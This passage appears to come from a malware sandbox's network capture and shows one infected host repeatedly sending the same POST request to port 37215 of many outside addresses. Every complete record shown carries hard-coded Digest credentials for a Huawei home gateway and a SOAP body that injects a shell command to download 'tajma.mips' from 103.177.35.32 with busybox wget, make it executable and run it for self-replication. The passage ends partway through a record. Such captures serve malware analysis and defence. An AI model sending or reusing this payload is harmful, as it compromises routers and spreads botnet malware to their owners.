                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2352192.168.2.2348934201.233.162.15137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591415882 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2353192.168.2.2339244157.248.116.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591418982 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2354192.168.2.234569041.117.160.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591443062 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2355192.168.2.233415241.153.120.22437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591470003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2356192.168.2.233776061.204.207.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591844082 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2357192.168.2.2339458197.152.155.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591847897 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2358192.168.2.2339226157.199.163.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592761993 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2359192.168.2.234976441.137.98.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592771053 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2360192.168.2.2344224157.100.28.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592816114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2361192.168.2.236062641.76.136.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592902899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
